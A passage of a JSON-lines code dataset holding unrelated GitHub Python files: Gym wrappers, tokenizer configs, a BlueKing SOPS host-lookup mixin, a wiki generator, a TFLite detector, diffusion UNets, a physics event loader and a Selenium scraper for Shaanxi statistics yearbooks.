The purpose is to give the network an idea\n about the dynamics of the objects, such as the speed and direction of the ball\n in Pong or how enemies are moving. This is very important information,\n which it is not possible to obtain from a single image.\n \"\"\"\n def __init__(self, env, n_steps, dtype=np.float32):\n super(BufferWrapper, self).__init__(env)\n self.dtype = dtype\n self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)\n old_space = env.observation_space\n self.observation_space = gym.spaces.Box(old_space.low.repeat(n_steps, axis=0),\n old_space.high.repeat(n_steps, axis=0),\n dtype=dtype)\n\n def reset(self, **kwargs):\n self.buffer = np.zeros_like(self.observation_space.low, dtype=self.dtype)\n return self.observation(self.env.reset())\n\n def observation(self, observation):\n self.buffer[:-1] = self.buffer[1:]\n self.buffer[-1] = observation\n return self.buffer\n\n\nclass ImageToPyTorch(gym.ObservationWrapper):\n \"\"\"\n This simple wrapper changes the shape of the observation from HWC to the\n CHW format required by PyTorch. The input shape of the tensor has a color\n channel as the last dimension, but PyTorch's convolution layers assume the\n color channel to be the first dimension.\n\n \"\"\"\n def __init__(self, env):\n super(ImageToPyTorch, self).__init__(env)\n old_shape = self.observation_space.shape\n self.observation_space = gym.spaces.Box(low=0.0,\n high=1.0,\n shape=(old_shape[-1],\n old_shape[0],\n old_shape[1]),\n dtype=np.float32)\n\n def observation(self, observation):\n return np.moveaxis(observation, 2, 0)\n\n\nclass ScaledFloatFrame(gym.ObservationWrapper):\n def observation(self, observation):\n return np.array(observation).astype(np.float32) / 255.0\n\n\ndef make_env(env_name):\n env = gym.make(env_name)\n env = MaxAndSkipEnv(env)\n env = FireResetEnv(env)\n env = ProcessFrame84(env)\n env = ImageToPyTorch(env)\n env = BufferWrapper(env, 4)\n return ScaledFloatFrame(env)","repo_name":"GuyRobot/RL-Python","sub_path":"DeepQLearning/Wrapper.py","file_name":"Wrapper.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10787821259","text":"from hydra.core.config_store import ConfigStore\nfrom omegaconf import MISSING\nfrom pydantic import validator\nfrom pydantic.dataclasses import dataclass\n\n\n@dataclass\nclass DecoderConfig:\n _target_: str = MISSING\n\n\n@dataclass\nclass BPEDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.BPEDecoder\"\n suffix: str = \"\"\n\n\n@dataclass\nclass ByteLevelDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.ByteLevel\"\n\n\n@dataclass\nclass CTCDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.CTC\"\n pad_token: str = \"\"\n word_delimiter_token: str = \"|\"\n cleanup: bool = True\n\n\n@dataclass\nclass MetaspaceDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.Metaspace\"\n replacement: str = \"_\"\n add_prefix_space: bool = True\n\n @validator(\"replacement\")\n def validate_replacement(cls, replacement: str) -> str:\n if len(replacement) > 1:\n raise ValueError(f\"len(replacement) must be 1, got: {len(replacement)}\")\n return replacement\n\n\n@dataclass\nclass WordPieceDecoderConfig(DecoderConfig):\n _target_: str = \"tokenizers.decoders.Metaspace\"\n prefix: str = \"##\"\n cleanup: bool = True\n\n\ndef setup_config() -> None:\n cs = ConfigStore.instance()\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"bpe_decoder_schema\",\n node=BPEDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"byte_level_decoder_schema\",\n node=ByteLevelDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"ctc_decoder_schema\",\n node=CTCDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"metaspace_decoder_schema\",\n node=MetaspaceDecoderConfig,\n )\n\n cs.store(\n group=\"tokenizer/decoder\",\n name=\"word_piece_decoder_schema\",\n node=WordPieceDecoderConfig,\n )\n","repo_name":"emkademy/cybulde-data-preparation","sub_path":"cybulde/config_schemas/tokenization/decoder_schema.py","file_name":"decoder_schema.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5447816175","text":"from fpdf import FPDF\nimport glob\nfrom pathlib import Path\n\nfiles = glob.glob(\"file/*.txt\")\npdf = FPDF(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\nfor file in files:\n title = Path(file).stem.title()\n pdf.add_page()\n pdf.set_font(family=\"Times\", style=\"B\", size=20)\n pdf.cell(w=150, h=7, txt=title)\n pdf.ln(10)\n with open(file, \"r\") as content:\n content = content.read()\n pdf.set_font(family=\"Times\", size=12)\n pdf.multi_cell(w=180, h=6, txt=content, align=\"J\")\n\npdf.output(\"studpro.pdf\")","repo_name":"muhlisasri/app4-invoice-generation","sub_path":"studentproject/studpro.py","file_name":"studpro.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"113640332","text":"import sys\nsys.setrecursionlimit(10 ** 9)\ninput = sys.stdin.readline\n\ndef DFS(v):\n for i in tree[v]:\n if visited[i] == 0:\n visited[i] = v\n DFS(i)\n\nn = int(input())\ntree = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n parent, child = map(int, input().split())\n tree[parent].append(child)\n tree[child].append(parent)\nvisited = [0] * (n + 1)\n\nDFS(1)\nfor parent in visited[2:]:\n print(parent)","repo_name":"cosmos-1885/Algorithm","sub_path":"알고리즘 분류/그래프 탐색/No.11725.py","file_name":"No.11725.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30111772618","text":"import csv\nimport json\n\nwith open(\"C:/Temp/students.json\", \"r\", encoding=\"utf-8\") as fin, \\\n open(\"C:/Temp/students_data.csv\", \"w\", encoding=\"utf-8\", newline=\"\") as fout:\n \n students = json.load(fin)\n flds=[\"name\",\"phone\"]\n data = [dict(zip(flds,[s[flds[0]],s[flds[1]]])) for s in students if s[\"age\"]>=18 and s[\"progress\"]>=75]\n \n writer = csv.DictWriter(fout, fieldnames=flds)\n writer.writeheader()\n writer.writerows(sorted(data, key=lambda x: x[flds[0]]))","repo_name":"vepankin/python_stepik","sub_path":"json_students_data.py","file_name":"json_students_data.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26527207627","text":"# -*- coding: utf-8 -*-\nfrom gcloud.conf import settings\nfrom gcloud.utils.ip import get_ip_by_regex, extract_ip_from_ip_str\nfrom pipeline_plugins.base.utils.inject import supplier_account_for_business\nfrom pipeline_plugins.components.collections.sites.open.cc.base import cc_get_host_by_innerip_with_ipv6\nfrom pipeline_plugins.components.collections.sites.open.cc.ipv6_utils import (\n cc_get_host_by_innerip_with_ipv6_across_business,\n)\nfrom pipeline_plugins.components.utils.sites.open.utils import get_biz_ip_from_frontend, get_biz_ip_from_frontend_hybrid\n\n\nclass GetJobTargetServerMixin(object):\n def get_target_server_ipv6(self, executor, biz_cc_id, ip_str, logger_handle, data):\n supplier_account = supplier_account_for_business(biz_cc_id)\n logger_handle.info(\"[get_target_server_ipv6] start search this ip:{}\".format(ip_str))\n host_result = cc_get_host_by_innerip_with_ipv6(executor, biz_cc_id, ip_str, supplier_account)\n logger_handle.info(\n \"[get_target_server_ipv6] start search this ip: {} end, result={}\".format(ip_str, host_result)\n )\n if not host_result[\"result\"]:\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确,ip_list={}\".format(host_result.get(\"message\"))\n return False, {}\n\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_result[\"data\"]]}\n\n def get_target_server_ipv6_across_business(self, executor, biz_cc_id, ip_str, logger_handle, data):\n \"\"\"\n step 1: 去本业务查这些ip,得到两个列表,本业务查询到的host, 本业务查不到的ip列表\n step 2: 对于本业务查不到的host, 去全业务查询,查不到的话则报错,将查到的host_id 与 本业务的 host_id 进行合并\n \"\"\"\n logger_handle.info(\"[get_target_server_ipv6_across_business] start search ip, ip_str={}\".format(ip_str))\n supplier_account = supplier_account_for_business(biz_cc_id)\n # 去本业务查\n try:\n (\n host_list,\n ipv4_not_find_list,\n ipv4_with_cloud_not_find_list,\n ipv6_not_find_list,\n ipv6_with_cloud_not_find_list,\n ) = cc_get_host_by_innerip_with_ipv6_across_business(executor, biz_cc_id, ip_str, supplier_account)\n except Exception as e:\n logger_handle.exception(\n f\"[get_target_server_ipv6_across_business] call \"\n f\"cc_get_host_by_innerip_with_ipv6_across_business error: {e}\"\n )\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确:{}\".format(e)\n return False, {}\n\n ip_not_find_str = \",\".join(\n ipv4_not_find_list + ipv6_not_find_list + ipv4_with_cloud_not_find_list + ipv6_with_cloud_not_find_list\n )\n logger_handle.info(\n \"[get_target_server_ipv6_across_business] not find this ip, ip_not_find_str={}\".format(ip_not_find_str)\n )\n # 剩下的ip去全业务查\n host_result = cc_get_host_by_innerip_with_ipv6(\n executor, None, ip_not_find_str, supplier_account, is_biz_set=True\n )\n logger_handle.info(\n \"[get_target_server_ipv6_across_business] start search this ip:{}, result:{}\".format(\n ip_not_find_str, host_list\n )\n )\n if not host_result[\"result\"]:\n data.outputs.ex_data = \"ip查询失败,请检查ip配置是否正确,ip_list={}\".format(host_result.get(\"message\"))\n return False, {}\n host_data = host_result[\"data\"] + host_list\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_data]}\n\n def get_target_server(\n self,\n executor,\n biz_cc_id,\n data,\n ip_str,\n logger_handle,\n ip_is_exist=False,\n is_across=False,\n ignore_ex_data=False,\n ):\n if settings.ENABLE_IPV6:\n if is_across:\n return self.get_target_server_ipv6_across_business(executor, biz_cc_id, ip_str, logger_handle, data)\n return self.get_target_server_ipv6(executor, biz_cc_id, ip_str, logger_handle, data)\n # 获取IP\n clean_result, ip_list = get_biz_ip_from_frontend(\n ip_str,\n executor,\n biz_cc_id,\n data,\n logger_handle=logger_handle,\n is_across=is_across,\n ip_is_exist=ip_is_exist,\n ignore_ex_data=ignore_ex_data,\n )\n if not clean_result:\n return False, {}\n\n return True, {\"ip_list\": ip_list}\n\n def get_target_server_hybrid(self, executor, biz_cc_id, data, ip_str, logger_handle):\n if settings.ENABLE_IPV6:\n return self.get_target_server_ipv6_across_business(executor, biz_cc_id, ip_str, logger_handle, data)\n # 获取IP\n clean_result, ip_list = get_biz_ip_from_frontend_hybrid(executor, ip_str, biz_cc_id, data)\n if not clean_result:\n return False, {}\n\n return True, {\"ip_list\": ip_list}\n\n def get_target_server_biz_set(\n self, executor, ip_table, supplier_account, logger_handle, ip_key=\"ip\", need_build_ip=True\n ):\n def build_ip_str_from_table():\n ip_list = []\n # 第二步 分析表格, 得到 ipv6, host_id,ipv4, 三种字符串,并连接成字符串\n for _ip in ip_table:\n ipv6_list, ipv4_list, host_id_list, *_ = extract_ip_from_ip_str(_ip[ip_key]) # noqa\n host_id_list = [str(host_id) for host_id in host_id_list]\n ip_list.extend(\n [\n *[\"{}:[{}]\".format(_ip.get(\"bk_cloud_id\", 0), item) for item in ipv6_list],\n *host_id_list,\n *[\"{}:{}\".format(_ip.get(\"bk_cloud_id\", 0), item) for item in ipv4_list],\n ]\n )\n return \",\".join(ip_list)\n\n if settings.ENABLE_IPV6:\n # 第一步 查询这个业务集下所有的业务id, 得到bk_biz_ids\n ip_str = ip_table\n # 在业务集的执行方案中,可能不需要额外处理ip,这种情况直接透传就好\n if need_build_ip:\n ip_str = build_ip_str_from_table()\n logger_handle.info(\"[get_target_server_biz_set] build ip_str, ip_str is {}\".format(ip_str))\n host_result = cc_get_host_by_innerip_with_ipv6(executor, None, ip_str, supplier_account, is_biz_set=True)\n logger_handle.info(\"[get_target_server_biz_set] search ip end, host_result is {}\".format(host_result))\n if not host_result[\"result\"]:\n return False, {}\n return True, {\"host_id_list\": [int(host[\"bk_host_id\"]) for host in host_result[\"data\"]]}\n\n # 拼装ip_list, bk_cloud_id为空则值为0\n ip_list = [\n {\"ip\": ip, \"bk_cloud_id\": int(_ip[\"bk_cloud_id\"]) if str(_ip[\"bk_cloud_id\"]) else 0}\n for _ip in ip_table\n for ip in get_ip_by_regex(_ip[ip_key])\n ]\n\n return True, {\"ip_list\": ip_list}\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"pipeline_plugins/components/collections/sites/open/job/ipv6_base.py","file_name":"ipv6_base.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"70139779690","text":"from conf import PROJECT_ROOT_DIR\nimport os\nimport pandas as pd\nimport numpy as np\nimport re\n\nfrom git_status import get_repo_list\n\n\ndef get_wiki_status_color(input_text):\n if input_text is None or input_text == 'inactive':\n result_text = \":heavy_multiplication_x:\"\n else:\n result_text = \":heavy_check_mark:\"\n return '{}'.format(result_text)\n\n\ndef get_wiki_rating(input_rating):\n result_text = ''\n if input_rating is not None and not np.isnan(input_rating):\n rating = int(input_rating)\n result_text = ':star:x{}'.format(rating)\n return '{}'.format(result_text)\n\n\ndef generate_wiki_per_category(output_path, update_readme: bool = True):\n \"\"\"\n\n :param update_readme:\n :param output_path:\n \"\"\"\n repo_df = get_repo_list()\n for category in repo_df['category'].unique():\n category_df = repo_df[repo_df['category'] == category].copy()\n url_md_list = []\n for idx, irow in category_df[['name', 'url']].iterrows():\n url_md_list.append('[{}]({})'.format(irow['name'], irow['url']))\n\n formatted_df = pd.DataFrame({\n 'repo': url_md_list,\n 'comment': category_df['comment'].apply(lambda x: '{}'.format(x)),\n 'created_at': category_df['created_at'].apply(lambda x: '{}'.format(x)),\n 'last_commit': category_df['last_commit'].apply(lambda x: '{}'.format(x)),\n 'star_count': category_df['star_count'].apply(lambda x: '{}'.format(x)),\n 'repo_status': category_df['repo_status'],\n 'rating': category_df['rating']\n })\n # add color for the status\n formatted_df = formatted_df.sort_values(by=['rating', 'star_count'], ascending=False).reset_index(drop=True)\n formatted_df['repo_status'] = formatted_df['repo_status'].apply(lambda x: get_wiki_status_color(x))\n formatted_df['rating'] = formatted_df['rating'].apply(lambda x: get_wiki_rating(x))\n formatted_df.columns = ['{}'.format(x) for x in formatted_df.columns]\n\n clean_category_name = category.lower().replace(' ', '_')\n output_path_full = os.path.join(output_path, '{}.md'.format(clean_category_name))\n with open(output_path_full, 'w') as f:\n f.write(formatted_df.to_markdown(index=False))\n print('wiki generated in [{}]'.format(output_path_full))\n\n if update_readme:\n check_str = '[PLACEHOLDER_START:{}]'.format(clean_category_name)\n with open(os.path.join(PROJECT_ROOT_DIR, 'README.md')) as f:\n all_read_me = f.read()\n if check_str not in all_read_me:\n print(f'section {check_str} not found')\n continue\n\n # only display top 5, then expandable for extra 5\n with open(os.path.join(PROJECT_ROOT_DIR, 'README.md'), 'w') as f:\n\n table_str = formatted_df.iloc[:15].to_markdown(index=False)\n new_str = f\" \\n\"\n new_str += table_str\n new_str += f\"\"\n\n search_start = re.escape(''.format(clean_category_name))\n search_end = re.escape(''.format(clean_category_name))\n pattern_s = re.compile(r'{}.*?{}'.format(search_start, search_end), re.DOTALL)\n write_str = re.sub(pattern_s, new_str, all_read_me)\n f.write(write_str)\n\n\nif __name__ == '__main__':\n local_path = os.path.join(PROJECT_ROOT_DIR, 'generated_wiki')\n generate_wiki_per_category(local_path)\n","repo_name":"firmai/financial-machine-learning","sub_path":"wiki_gen.py","file_name":"wiki_gen.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":5070,"dataset":"github-code","pt":"53"} +{"seq_id":"622273703","text":"import numpy as np\nimport tensorflow as tf\nimport cv2\n\nfrom object_detector_detection_api import ObjectDetectorDetectionAPI, \\\n PATH_TO_LABELS, NUM_CLASSES\n\n\nclass ObjectDetectorLite(ObjectDetectorDetectionAPI):\n def __init__(self, model_path='converted_shopmodel3.tflite'):\n \"\"\"\n Builds Tensorflow graph, load model and labels\n \"\"\"\n\n # Load lebel_map\n self._load_label(PATH_TO_LABELS, NUM_CLASSES, use_disp_name=True)\n\n # Define lite graph and Load Tensorflow Lite model into memory\n self.interpreter = tf.lite.Interpreter(\n model_path=model_path)\n self.interpreter.allocate_tensors()\n self.input_details = self.interpreter.get_input_details()\n self.output_details = self.interpreter.get_output_details()\n\n def detect(self, image, threshold=0.1):\n \"\"\"\n Predicts person in frame with threshold level of confidence\n Returns list with top-left, bottom-right coordinates and list with labels, confidence in %\n \"\"\"\n\n # Resize and normalize image for network input\n frame = cv2.resize(image, (64, 64))\n frame = np.expand_dims(frame, axis=0)\n frame = (2.0 / 255.0) * frame - 1.0\n frame = frame.astype('float32')\n\n # run model\n self.interpreter.set_tensor(self.input_details[0]['index'], frame)\n self.interpreter.invoke()\n\n # get results\n boxes = self.interpreter.get_tensor(\n self.output_details[0]['index'])\n print(boxes)\n classes = self.interpreter.get_tensor(\n self.output_details[1]['index'])\n scores = self.interpreter.get_tensor(\n self.output_details[2]['index'])\n num = self.interpreter.get_tensor(\n self.output_details[3]['index'])\n\n # Find detected boxes coordinates\n return self._boxes_coordinates(image,\n np.squeeze(boxes[0]),\n np.squeeze(classes[0]+1).astype(np.int32),\n np.squeeze(scores[0]),\n min_score_thresh=threshold)\n\n def close(self):\n pass\n\n\nif __name__ == '__main__':\n detector = ObjectDetectorLite()\n\n image = cv2.cvtColor(cv2.imread('dog.jpg'), cv2.COLOR_BGR2RGB)\n\n result = detector.detect(image, 0.4)\n print(result)\n\n for obj in result:\n print('coordinates: {} {}. class: \"{}\". confidence: {:.2f}'.\n format(obj[0], obj[1], obj[3], obj[2]))\n\n cv2.rectangle(image, obj[0], obj[1], (0, 255, 0), 2)\n cv2.putText(image, '{}: {:.2f}'.format(obj[3], obj[2]),\n (obj[0][0], obj[0][1] - 5),\n cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 2)\n\n cv2.imwrite('r1.jpg', cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\n detector.close()\n","repo_name":"Pixel-Pi/CVProject","sub_path":"mobile_detector/object_detector_detection_api_lite.py","file_name":"object_detector_detection_api_lite.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12168140958","text":"import math\nimport torch\nfrom torch import nn\n\nclass Block(nn.Module):\n def __init__(self, in_ch, out_ch, time_emb_dim, up=False):\n super().__init__()\n self.time_mlp = nn.Linear(time_emb_dim, out_ch)\n if up:\n self.conv1 = nn.Conv2d(2 * in_ch, out_ch, 3, padding=1)\n self.transform = nn.ConvTranspose2d(out_ch, out_ch, 4, 2, 1)\n else:\n self.conv1 = nn.Conv2d(in_ch, out_ch, 3, padding=1)\n self.transform = nn.Conv2d(out_ch, out_ch, 4, 2, 1)\n self.conv2 = nn.Conv2d(out_ch, out_ch, 3, padding=1)\n self.bnorm1 = nn.BatchNorm2d(out_ch)\n self.bnorm2 = nn.BatchNorm2d(out_ch)\n self.relu = nn.ReLU()\n\n def forward(self, x, t):\n h = self.bnorm1(self.relu(self.conv1(x)))\n time_emb = self.relu(self.time_mlp(t))\n time_emb = time_emb[(...,) + (None,) * 2]\n h = h + time_emb\n h = self.bnorm2(self.relu(self.conv2(h)))\n return self.transform(h)\n\n\nclass SinusoidalPositionEmbeddings(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, time):\n device = time.device\n half_dim = self.dim // 2\n embeddings = math.log(10000) / (half_dim - 1)\n embeddings = torch.exp(torch.arange(half_dim, device=device) * -embeddings)\n embeddings = time[:, None] * embeddings[None, :]\n embeddings = torch.cat((embeddings.sin(), embeddings.cos()), dim=-1)\n # TODO: Double check the ordering here\n return embeddings\n\n\nclass SimpleUnet(nn.Module):\n def __init__(self):\n super().__init__()\n image_channels = 3\n down_channels = (64, 128, 256, 512, 1024)\n up_channels = (1024, 512, 256, 128, 64)\n out_dim = 3\n time_emb_dim = 32\n\n self.time_mlp = nn.Sequential(\n SinusoidalPositionEmbeddings(time_emb_dim),\n nn.Linear(time_emb_dim, time_emb_dim),\n nn.ReLU(),\n )\n self.conv0 = nn.Conv2d(image_channels, down_channels[0], 3, padding=1)\n self.downs = nn.ModuleList(\n [\n Block(down_channels[i], down_channels[i + 1], time_emb_dim)\n for i in range(len(down_channels) - 1)\n ]\n )\n self.ups = nn.ModuleList(\n [\n Block(up_channels[i], up_channels[i + 1], time_emb_dim, up=True)\n for i in range(len(up_channels) - 1)\n ]\n )\n self.output = nn.Conv2d(up_channels[-1], out_dim, 1)\n\n def forward(self, x, timestep):\n t = self.time_mlp(timestep)\n x = self.conv0(x)\n residual_inputs = []\n for down in self.downs:\n x = down(x, t)\n residual_inputs.append(x)\n for up in self.ups:\n residual_x = residual_inputs.pop()\n x = torch.cat((x, residual_x), dim=1)\n x = up(x, t)\n return self.output(x)\n\n\nclass UNet(nn.Module):\n def __init__(self, in_channels=1, out_channels=1):\n super().__init__()\n self.down_layers = torch.nn.ModuleList(\n [\n nn.Conv2d(in_channels, 32, kernel_size=5, padding=2),\n nn.Conv2d(32, 64, kernel_size=5, padding=2),\n nn.Conv2d(64, 64, kernel_size=5, padding=2),\n ]\n )\n self.up_layers = torch.nn.ModuleList(\n [\n nn.Conv2d(64, 64, kernel_size=5, padding=2),\n nn.Conv2d(64, 32, kernel_size=5, padding=2),\n nn.Conv2d(32, out_channels, kernel_size=5, padding=2),\n ]\n )\n self.act = nn.SiLU()\n self.downscale = nn.MaxPool2d(2)\n self.upscale = nn.Upsample(scale_factor=2)\n\n def forward(self, x):\n h = []\n for i, l in enumerate(self.down_layers):\n x = self.act(l(x))\n if i < 2:\n h.append(x)\n x = self.downscale(x)\n\n for i, l in enumerate(self.up_layers):\n if i > 0:\n x = self.upscale(x)\n x += h.pop()\n x = self.act(l(x))\n\n return x","repo_name":"HamzaYousVision/transformers-in-vision","sub_path":"diffusion_models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16141346320","text":"import os\nfrom .ReadBinary import ReadBlock as rb\nfrom .ReadText import ReadFile as rt\nimport traceback\nimport numpy as np\n\n\nfull_loadlist = ['fastDAQ', 'slowDAQ', 'PMTtraces', 'event',\n 'camdata', 'images', 'DAQsetings']\n\n\ndef GetEvent(rundirectory, ev, *loadlist, max_file_size=None):\n event = dict()\n event_dir = os.path.join(rundirectory, str(ev))\n for key in full_loadlist:\n event[key] = dict(loaded=False)\n\n neglist = False\n if len(loadlist) == 0:\n loadlist = full_loadlist\n elif len(loadlist[0]) > 0 and loadlist[0][0:1] == '~':\n neglist = True\n\n if ('fastDAQ' in loadlist) or (neglist and '~fastDAQ' not in loadlist):\n i_file = 0\n while True:\n\n binfile = os.path.join(event_dir,\n 'fastDAQ_' + str(i_file) + '.bin')\n calfile = os.path.join(event_dir,\n 'fastDAQ_' + str(i_file) + '_cal.txt')\n\n if not (os.path.exists(binfile) and os.path.exists(calfile)):\n break\n\n try:\n d_bin = rb(binfile, max_file_size=max_file_size)\n d_cal = rt(calfile)\n d = dict()\n for key in d_bin:\n d[key] = d_bin[key] * d_cal[key + '_multiplier'] + \\\n d_cal[key + '_offset']\n if 'time' in d_bin:\n print(\"Whoa, there's a field named time in fastDAQ_\" +\n str(i_file))\n d['time'] = (range(d[list(d.keys())[0]].size) -\n d_cal['pretrigger_samples']) * d_cal['dt']\n if 'bindata' in d_bin:\n print(\"Whoa, there's a field named bindata in fastDAQ_\" +\n str(i_file))\n d['bindata'] = d_bin\n if 'caldata' in d_bin:\n print(\"Whoa, there's a field named caldata in fastDAQ_\" +\n str(i_file))\n d['caldata'] = d_cal\n\n except:\n print('Failed to load fastDAQ_' + str(i_file))\n traceback.print_exc()\n break\n\n if i_file == 0:\n event['fastDAQ'] = d\n event['fastDAQ']['multiboards'] = [d]\n else:\n event['fastDAQ']['multiboards'].append(d)\n\n event['fastDAQ']['loaded'] = True\n i_file += 1\n\n if ('slowDAQ' in loadlist) or (neglist and '~slowDAQ' not in loadlist):\n try:\n d = rt(os.path.join(event_dir, 'slowDAQ_0.txt'))\n event['slowDAQ'] = d\n event['slowDAQ']['loaded'] = True\n except:\n print('Failed to load slowDAQ_0.txt')\n traceback.print_exc()\n\n if ('PMTtraces' in loadlist) or (neglist and '~PMTtraces' not in loadlist):\n try:\n d = rb(os.path.join(event_dir, 'PMTtraces.bin'), max_file_size=max_file_size)\n event['PMTtraces'] = d\n event['PMTtraces']['loaded'] = True\n except:\n print('Failed to load PMTtraces')\n traceback.print_exc()\n\n\n if ('event' in loadlist) or (neglist and '~event' not in loadlist):\n try:\n with open(os.path.join(event_dir, 'Event.txt'), 'r') as ev_txt:\n ev_str = next(ev_txt)\n ev_dat = ev_str.split()\n event['event']['run_type'] = np.int32(ev_dat[2])\n event['event']['trigger_main'] = np.int32(ev_dat[3])\n event['event']['trigger_cameras'] = np.int32(ev_dat[4])\n event['event']['trigger_PLC'] = np.int32(ev_dat[5])\n event['event']['trigger_slowDAQ'] = np.int32(ev_dat[6])\n event['event']['timestamp'] = np.float64(ev_dat[7])\n event['event']['mstick'] = np.int64(ev_dat[8])\n event['event']['Pset'] = np.float64(ev_dat[9])\n event['event']['livetime'] = np.float64(ev_dat[10])\n event['event']['loaded'] = True\n except:\n print('Failed to load Event')\n traceback.print_exc()\n\n return event\n","repo_name":"SBC-Collaboration/SBC-Analysis","sub_path":"DataHandling/GetSBCEvent.py","file_name":"GetSBCEvent.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17074534284","text":"# -*- coding: utf-8 -*- \n\n\nimport time\nfrom util.utilis import *\nfrom util.logger import Logger\nimport os\nfrom selenium import webdriver\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nfrom util.utilis import *\nimport os.path as osp\n\ninfo_log = Logger('../log/guizhou_info.log','info')\nerror_log = Logger('../log/guizhou_error.log','info')\ninfo_log.logger.info('开始爬取数据了')\nerror_log.logger.error('请检查网络设置,目前断线')\nfrom bs4 import BeautifulSoup\nyear_list = sorted(list(range(2010,2020,1)),reverse =True)\ndownload_dir = os.path.abspath('./data')\noptions = webdriver.ChromeOptions()\nprefs = { 'download.default_directory': download_dir}\noptions.add_experimental_option('prefs', prefs)\ndriver = webdriver.Chrome(chrome_options=options)\n\ndef write_json(json_fn, json_dict):\n if not os.path.exists(json_fn):\n write_list = [json_dict]\n else:\n write_list = read_json(json_fn)\n write_list.append(json_dict)\n with open(json_fn, \"w\",encoding='utf-8') as f:\n json.dump(write_list, f, ensure_ascii=False,indent=4)\ndef getDonwLoadFileName(download_path, filaname, timing):\n '''\n 用于检查文件是否下载完成,当下载完成时会从这个函数跳出\n\n :param download_path: chromeDiver默认下载文件的位置\n :param row: 字典形式,由页面解析生成的,负责提供下载的文件名称信息\n :return:\n '''\n\n # document_name_zip = row['文件名称']+'.zip'\n # document_name_rar = row['文件名称']+'.rar'\n # check_down_load_path_zip = os.path.join(download_path,document_name_zip)\n # check_down_load_path_rar = os.path.join(download_path, document_name_rar)\n time_hold = 0\n while True:\n # if os.path.exists(check_down_load_path_zip):\n # document_name = document_name_zip\n # break\n # if os.path.exists(check_down_load_path_rar):\n # document_name = document_name_rar\n # break\n try:\n newest_file = newest_filename(download_path)\n finished_time = os.path.getatime(os.path.join(download_path, newest_file))\n except:\n newest_file = ''\n finished_time = 0\n if timing <= finished_time and 'download' not in newest_file and '.tmp' not in newest_file :\n time.sleep(1)\n return newest_file\n time.sleep(1)\n time_hold += 1\n if time_hold >= 50:\n error_log.logger.error('如果文件没下载完,按任意键继续;如果网络问题,请输入 quit 退出')\n a = input()\n if a == 'quit':\n return a\n # time.sleep(0.5)\n # return document_name\n\n\ndef newest_filename(path_file):\n '''\n 给定文件目录,返回最新下载的文件信息\n Args:\n path_file:文件目录\n\n Returns: File_Path\n\n '''\n lists = os.listdir(path_file)\n lists.sort(key=lambda fn: os.path.getmtime(path_file + '\\\\' + fn))\n\n return lists[-1]\n\n\n\n\ndef main():\n\n if os.path.exists('shanxi.json'):\n json_list = read_json('shanxi.json')\n else:\n json_list = []\n url_list = [\n 'http://tjj.shaanxi.gov.cn/upload/n2020/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2020/pro/3sxtjnj/zk/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/201802/zk/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2018/7/zk/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2016/tongjinianj2016/2016/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2016/tongjinianj/2015/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2014/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2013/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2012/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2011/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2010/indexce.htm'\n ]\n for year,base_url in zip(year_list,url_list):\n\n # base_url = 'http://tjj.shaanxi.gov.cn/upload/{}/zk/indexce.htm'.format(2018)\n driver.get(base_url)\n driver.switch_to.frame(1)\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n # download_list = driver.find_elements_by_xpath(\"//table[@id='fileListTable']//a\")\n ####整个目录\n topic_list = soup.find_all('li',attrs = {'id':'foldheader'})\n\n\n for topic in 